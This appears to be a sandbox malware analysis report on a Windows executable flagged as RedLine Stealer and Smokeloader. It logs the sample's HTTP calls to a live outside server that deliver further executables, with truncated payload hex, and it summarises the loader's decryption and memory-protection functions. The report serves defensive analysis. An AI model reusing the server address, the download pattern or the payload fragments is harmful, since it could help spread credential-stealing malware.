Dec 20, 2024 17:33:00.586260080 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:33:02.022774935 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:33:01 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49849	185.156.73.23	80	5740	C:\Users\user\Desktop\WwVs3PavPg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 17:33:04.237968922 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:33:05.918019056 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:33:05 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49860	185.156.73.23	80	5740	C:\Users\user\Desktop\WwVs3PavPg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 17:33:08.059966087 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:33:09.605865002 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:33:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49869	185.156.73.23	80	5740	C:\Users\user\Desktop\WwVs3PavPg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 17:33:11.903011084 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:33:14.352859974 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:33:13 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49884	185.156.73.23	80	5740	C:\Users\user\Desktop\WwVs3PavPg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 17:33:17.559334993 CET	394	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: d Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:33:19.153034925 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:33:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Disposition: attachment; filename="dll"; Content-Length: 242176 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}:s(2rp(;&Vrprp(>}(Co(D(E}(F(E(G&>}(Co(D}(F(E(H&">}R} { oo{ "}!{!}{#{op{,{ oo{!oo{*Bsu
Dec 20, 2024 17:33:19.153075933 CET	1236	IN	Data Raw: 00 00 0a 28 76 00 00 0a 2a 8a 02 7b 23 00 00 04 02 7b 23 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a a6 02 7b 1f 00 00 04 2c 0e 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2b 0c 02 02 7b 21 00 00 04 6f 6f 00 00 0a 02 28 32 Data Ascii: (v{#{#owox(+oy{,{ oo+{!oo(2z,{",{"o/(z((X[((X[((X[(q~(-(-(*~to(3to^(
Dec 20, 2024 17:33:19.153196096 CET	1236	IN	Data Raw: 0a 2a 1e 02 7b 52 00 00 04 2a 32 02 7b 63 00 00 04 6f f2 00 00 0a 2a 52 02 03 7d 55 00 00 04 02 7b 63 00 00 04 03 6f 6f 00 00 0a 2a 1e 02 7b 51 00 00 04 2a 22 02 03 7d 51 00 00 04 2a 32 02 7b 63 00 00 04 6f 77 00 00 0a 2a 7e 02 7b 63 00 00 04 03 Data Ascii: {R2{coR}U{coo{Q"}Q2{cow~{coy}]so2{cosN{cop(2{dosN{dop({VR}Vs({WR}Ws(F{cot
Dec 20, 2024 17:33:19.153234005 CET	1236	IN	Data Raw: 02 03 7d 71 00 00 04 2a 1e 02 7b 72 00 00 04 2a 22 02 03 7d 72 00 00 04 2a 1e 02 28 30 01 00 0a 2a 1e 02 7b 73 00 00 04 2a 22 02 03 7d 73 00 00 04 2a 1e 02 7b 74 00 00 04 2a 22 02 03 7d 74 00 00 04 2a 1e 02 7b 75 00 00 04 2a 22 02 03 7d 75 00 00 Data Ascii: }q{r"}r(0{s"}s{t"}t{u"}uN((((z,{v,{vo/((5"}xN{o9o<&{\|f}\|{{\|o2{o?*{o9(
Dec 20, 2024 17:33:19.153541088 CET	1236	IN	Data Raw: 0a 02 02 fe 06 5d 01 00 06 73 89 00 00 0a 28 95 00 00 0a 02 16 28 97 00 00 0a 2a e6 02 72 a8 0f 00 70 7d 9f 00 00 04 02 72 a8 0f 00 70 7d a1 00 00 04 02 72 a8 0f 00 70 7d a2 00 00 04 02 72 a8 0f 00 70 7d a3 00 00 04 02 28 18 01 00 0a 02 28 81 01 Data Ascii: ]s((rp}rp}rp}rp}(({{{"}{"}{(dt%r2poeoftogz,{,{o/(*rp}rp}sm}
Dec 20, 2024 17:33:19.153574944 CET	1236	IN	Data Raw: 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 1e 02 7b cd 00 00 04 2a 76 03 16 30 0b 72 10 16 00 70 73 41 01 00 0a 7a 02 03 7d cd 00 00 04 02 28 da 01 00 06 2a 1e 02 7b ce 00 00 04 2a 76 02 03 7d ce 00 00 04 02 28 db 00 00 0a 2c 07 02 03 7d d1 00 00 Data Ascii: o/(z{v0rpsAz}({v}(,}({:}({:}(({o{ZX/{o{ZX((J{oooJ{oxo2{
Dec 20, 2024 17:33:19.153610945 CET	1236	IN	Data Raw: 7d 03 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 04 01 00 04 2a 3a 02 03 7d 04 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 05 01 00 04 2a 3a 02 03 7d 05 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 06 01 00 04 2a 3a 02 03 7d 06 01 00 04 02 28 6d 02 00 06 2a 1e Data Ascii: }(m{:}(m{:}(m{:}(m{{:}(m{:}(m{:}(m{:}(m{2{o^{{oo:}(m:
Dec 20, 2024 17:33:19.153662920 CET	108	IN	Data Raw: 02 7b 2b 01 00 04 03 6f 6f 00 00 0a 2a 32 02 7b 2b 01 00 04 6f f2 00 00 0a 2a 7a 03 2c 13 02 7b 2a 01 00 04 2c 0b 02 7b 2a 01 00 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 0a 16 2a 36 02 28 26 00 00 0a 02 28 dd 02 00 06 2a 52 02 28 26 00 00 0a 03 Data Ascii: {+oo2{+oz,{,{o/(z*6(&(R(&o(*z,{-,
Dec 20, 2024 17:33:19.153700113 CET	1236	IN	Data Raw: 7b 2d 01 00 04 6f 2f 00 00 0a 02 03 28 1b 01 00 0a 2a 32 02 73 dc 00 00 0a 7d 2d 01 00 04 2a b2 02 03 7d 36 01 00 04 02 7b 3d 01 00 04 6f 62 01 00 0a 2d 0c 02 7b 3d 01 00 04 6f 5c 01 00 0a 2a 72 54 1b 00 70 28 3b 00 00 0a 26 2a 7a 03 2c 13 02 7b Data Ascii: {-o/(2s}-}6{=ob-{=o\rTp(;&z,{<,{<o/(z:{0ot:{/ot:{.ot{CR}C{C(){>2{Fox6{Fo{?r{>,{Eoo
Dec 20, 2024 17:33:19.153974056 CET	1236	IN	Data Raw: 0a 28 de 01 00 0a 26 2a 3e 02 fe 15 3a 00 00 02 02 03 7d 64 01 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 64 01 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 df 01 00 0a 26 2a 22 02 fe 15 3b 00 00 02 2a 3e 02 fe 15 3c 00 Data Ascii: (&>:}d(Co(D}d(F(E(&";><}n{u"}u{v"}v{w"}w{x"}x{y"}y{z"}z{{"}{{\|"}\|{}"}}
Dec 20, 2024 17:33:19.273154020 CET	1236	IN	Data Raw: 01 00 04 28 b0 03 00 06 2a 46 02 28 e8 03 00 06 75 4e 00 00 02 6f 4b 04 00 06 2a 4a 02 28 e8 03 00 06 75 4e 00 00 02 03 6f 4c 04 00 06 2a 46 02 28 e8 03 00 06 75 4e 00 00 02 6f 4d 04 00 06 2a 4a 02 28 e8 03 00 06 75 4e 00 00 02 03 6f 4e 04 00 06 Data Ascii: (F(uNoKJ(uNoLF(uNoMJ(uNoN{"}{"}{"}{"}Z{3(o(os,(oP(oQ{"}{*"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49889	185.156.73.23	80	5740	C:\Users\user\Desktop\WwVs3PavPg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 17:33:19.305006027 CET	394	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: s Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:33:20.986183882 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:33:20 GMT Server: Apache/2.4.52 (Ubuntu) Content-Disposition: attachment; filename="soft"; Content-Length: 1502720 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU ((~-rp(os~~j(r=p~otj(rMp~otj(rp~otj(rp~otj(rp~otj(rp~otj(rp~ot~(Vs(tN(((0f(8Mo9:oo-
Dec 20, 2024 17:33:20.986305952 CET	1236	IN	Data Raw: 61 02 7b 11 00 00 04 1b 8d 3c 00 00 01 25 16 09 6f 1f 00 00 0a a2 25 17 72 2f 01 00 70 a2 25 18 11 05 28 12 00 00 06 a2 25 19 72 33 01 00 70 a2 25 1a 11 04 28 12 00 00 06 a2 28 20 00 00 0a 6f 21 00 00 0a 02 7b 12 00 00 04 11 05 1f 64 6a 5a 11 04 Data Ascii: a{<%o%r/p%(%r3p%(( o!{djZ[("o#83^{<%o%r/p%(%r3p%(( o!{djZ[("o#+`3\{<%o%r/p%(%r3
Dec 20, 2024 17:33:20.986323118 CET	1236	IN	Data Raw: 7b 17 00 00 04 19 6f 48 00 00 0a 02 7b 17 00 00 04 16 6f 49 00 00 0a 02 7b 17 00 00 04 72 1d 02 00 70 6f 4a 00 00 0a 02 7b 17 00 00 04 28 4b 00 00 0a 6f 4c 00 00 0a 02 7b 17 00 00 04 28 4d 00 00 0a 6f 4e 00 00 0a 02 7b 17 00 00 04 72 35 02 00 70 Data Ascii: {oH{oI{rpoJ{(KoL{(MoN{r5p"AsOoP{(<oQ{rKpoRtPoS{oT{oU{oV{oW{oX{oY{#oZ{o
Dec 20, 2024 17:33:20.986340046 CET	1236	IN	Data Raw: 45 00 00 0a 02 7b 08 00 00 04 72 39 03 00 70 6f 21 00 00 0a 02 7b 09 00 00 04 28 46 00 00 0a 6f 47 00 00 0a 02 7b 09 00 00 04 28 3c 00 00 0a 6f 39 00 00 0a 02 7b 09 00 00 04 19 6f 48 00 00 0a 02 7b 09 00 00 04 16 6f 49 00 00 0a 02 7b 09 00 00 04 Data Ascii: E{r9po!{(FoG{(<o9{oH{oI{rqpoJ{(KoL{(MoN{r5p"AsOoP{(<oQ{rypoRtPoS{oT{oU{oV{oW
Dec 20, 2024 17:33:20.986406088 CET	1236	IN	Data Raw: 7b 0b 00 00 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 0b 00 00 04 72 47 04 00 70 6f 42 00 00 0a 02 7b 0b 00 00 04 20 2c 05 00 00 20 81 00 00 00 73 43 00 00 0a 6f 44 00 00 0a 02 7b 0b 00 00 04 1e 6f 45 00 00 0a 02 7b 0b 00 00 04 02 fe 06 Data Ascii: {s@oA{rGpoB{ , sCoD{oE{skol{oi{rUp"@AsOoP{Es>o?{s@oA{rwpoB{ #sCoD{oE{rpo!
Dec 20, 2024 17:33:20.986421108 CET	1236	IN	Data Raw: 0f 00 00 04 28 76 00 00 0a 6f 77 00 00 0a 02 7b 0f 00 00 04 20 67 02 00 00 1f 34 73 43 00 00 0a 6f 44 00 00 0a 02 7b 0f 00 00 04 1f 0d 6f 45 00 00 0a 02 7b 0f 00 00 04 16 6f 23 00 00 0a 02 7b 14 00 00 04 17 6f 69 00 00 0a 02 7b 14 00 00 04 72 35 Data Ascii: (vow{ g4sCoD{oE{o#{oi{r5p"dAsOoP{ s>o?{s@oA{rpoB{ *sCoD{oE{r-po!{(so9{ot
Dec 20, 2024 17:33:20.986438036 CET	1236	IN	Data Raw: 02 7b 1a 00 00 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 1a 00 00 04 72 21 07 00 70 6f 42 00 00 0a 02 7b 1a 00 00 04 20 25 01 00 00 20 ee 00 00 00 73 43 00 00 0a 6f 44 00 00 0a 02 7b 1a 00 00 04 1a 6f 6f 00 00 0a 02 7b 1a 00 00 04 1b 6f Data Ascii: {s@oA{r!poB{ % sCoD{oo{op{oq{or{sgoh"A"As(( WsC((:{o;(:{o;(:{o;(
Dec 20, 2024 17:33:20.986865997 CET	1236	IN	Data Raw: 0a 6f 4c 00 00 0a 02 7b 1f 00 00 04 06 72 b5 04 00 70 6f 52 00 00 0a 74 50 00 00 01 6f 6d 00 00 0a 02 7b 1f 00 00 04 14 6f 6e 00 00 0a 02 7b 1f 00 00 04 20 71 04 00 00 1f 12 73 3e 00 00 0a 6f 3f 00 00 0a 02 7b 1f 00 00 04 1a 1b 1a 1b 73 40 00 00 Data Ascii: oL{rpoRtPom{on{ qs>o?{s@oA{rpoB{Q?sCoD{oo{op{oq{or{ sgoh{ oi{ rUp"AsOoP{
Dec 20, 2024 17:33:20.986892939 CET	1236	IN	Data Raw: 23 00 00 04 28 3c 00 00 0a 6f 39 00 00 0a 02 7b 23 00 00 04 19 6f 48 00 00 0a 02 7b 23 00 00 04 16 6f 49 00 00 0a 02 7b 23 00 00 04 72 a7 02 00 70 6f 4a 00 00 0a 02 7b 23 00 00 04 28 4b 00 00 0a 6f 4c 00 00 0a 02 7b 23 00 00 04 28 4d 00 00 0a 6f Data Ascii: #(<o9{#oH{#oI{#rpoJ{#(KoL{#(MoN{#r5p"AsOoP{#(<oQ{#rpoRtPoS{#oT{#oU{#oV{#oW{#oX{#oY{##
Dec 20, 2024 17:33:20.986908913 CET	1236	IN	Data Raw: 00 04 02 fe 06 24 00 00 06 73 67 00 00 0a 6f 68 00 00 0a 02 7b 26 00 00 04 28 46 00 00 0a 6f 47 00 00 0a 02 7b 26 00 00 04 28 3c 00 00 0a 6f 39 00 00 0a 02 7b 26 00 00 04 19 6f 48 00 00 0a 02 7b 26 00 00 04 16 6f 49 00 00 0a 02 7b 26 00 00 04 72 Data Ascii: $sgoh{&(FoG{&(<o9{&oH{&oI{&rSpoJ{&(KoL{&(MoN{&r5p"AsOoP{&(<oQ{&rpoRtPoS{&oT{&oU{&oV{&oW
Dec 20, 2024 17:33:21.106020927 CET	1236	IN	Data Raw: 7b 2c 00 00 04 1f 20 20 6e 01 00 00 73 3e 00 00 0a 6f 3f 00 00 0a 02 7b 2c 00 00 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 2c 00 00 04 72 21 07 00 70 6f 42 00 00 0a 02 7b 2c 00 00 04 20 09 01 00 00 20 10 01 00 00 73 43 00 00 0a 6f 44 00 Data Ascii: {, ns>o?{,s@oA{,r!poB{, sCoD{,oo{,op{,oq{,or{,&sgoh"A"As(( PsC((:{o;(:{"o;(:

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WwVs3PavPg.exePID: 5740, Parent PID: 4004

General

Target ID:	0
Start time:	11:32:01
Start date:	20/12/2024
Path:	C:\Users\user\Desktop\WwVs3PavPg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\WwVs3PavPg.exe"
Imagebase:	0x400000
File size:	1'928'704 bytes
MD5 hash:	4E341A5E65522DC7AD83BAB52F3E60F8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3071582950.0000000000D39000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4780, Parent PID: 5740

General

Target ID:	10
Start time:	11:33:20
Start date:	20/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 480
Imagebase:	0xde0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: WwVs3PavPg.exePID: 5740, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	20.3%
Signature Coverage:	11.6%
Total number of Nodes:	1102
Total number of Limit Nodes:	23

Executed Functions

Function 00402C70 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 504
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetLastError.KERNEL32(0000000D), ref: 00402C96
SetLastError.KERNEL32(000000C1), ref: 00402CD8

Strings

FileHeader.Machine != HOST_MACHINE!, xrefs: 00402D4A
@, xrefs: 00402C8F
ERROR_OUTOFMEMORY!, xrefs: 00402DEF
DOS header size is not valid!, xrefs: 00402D09
Size is not valid!, xrefs: 00402C9C
Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402D38
DOS header is not valid!, xrefs: 00402CC6
Section alignment invalid!, xrefs: 00402D5C
alignedImageSize != AlignValueUp!, xrefs: 00402DB9

Memory Dump Source

Source File: 00000000.00000002.3069083546.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3069083546.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WwVs3PavPg.jbxd

Similarity

API ID: ErrorLast
String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
API String ID: 1452528299-393758929
Opcode ID: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
Instruction ID: 68209fb506ae9b68e90255ee0055c9910cae7d9580854ddc7816d62818b51dcc
Opcode Fuzzy Hash: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
Instruction Fuzzy Hash: 3E129C71B002159BDB14CF98D985BAEBBB5BF48304F14416AE809BB3C1D7B8ED41CB98

Function 004034C0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 225
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,520B5901), ref: 00403540
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403564
_mbstowcs.LIBCMT ref: 004035B7
CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035CE
GetLastError.KERNEL32 ref: 004035D8
CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403600
GetLastError.KERNEL32 ref: 0040360A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040361A
CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036DC
CryptDestroyKey.ADVAPI32(?), ref: 0040374E

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040351C

Memory Dump Source

Source File: 00000000.00000002.3069083546.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3069083546.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WwVs3PavPg.jbxd

Similarity

API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 3642901890-63410773
Opcode ID: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
Instruction ID: 057eae88fc1e8b42dc2b0b13f8460ebd140b44a30a8541124d595f3772e2d34e
Opcode Fuzzy Hash: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
Instruction Fuzzy Hash: 4D8182B1A00218AFEF248F25CC45B9ABBB9EF45304F1081BAE50DE7291DB359E858F55

Function 00402950 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 004029F8
GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402A0D
FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A1B
LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A36
OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A55
LocalFree.KERNEL32(00000000), ref: 00402A62
LocalFree.KERNEL32(?), ref: 00402A67

Strings

Error protecting memory page, xrefs: 00402A41
%s: %s, xrefs: 00402A46

Memory Dump Source

Source File: 00000000.00000002.3069083546.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3069083546.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WwVs3PavPg.jbxd

Similarity

API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
String ID: %s: %s$Error protecting memory page
API String ID: 839691724-1484484497
Opcode ID: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
Instruction ID: 2da31f80489fd9465a3e1d2b594a5759e7c0520832ca97f04c55df17c8a78757
Opcode Fuzzy Hash: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
Instruction Fuzzy Hash: 0831F272B00114AFDB14DF58DC44FAAB7A8FF48304F0541AAE905EB291DA75AD12CA88

Function 00401880 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401905
InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401924

Strings

text, xrefs: 00401B5C

Memory Dump Source

Source File: 00000000.00000002.3069083546.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3069083546.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WwVs3PavPg.jbxd

Similarity

API ID: FileInternet$PointerRead
String ID: text
API String ID: 3197321146-999008199
Opcode ID: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
Instruction ID: 86dcce6fdabdf1d76a3839b2d4c7acaf7fb3a9f1032210a7d38a4a94718e3fd4
Opcode Fuzzy Hash: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
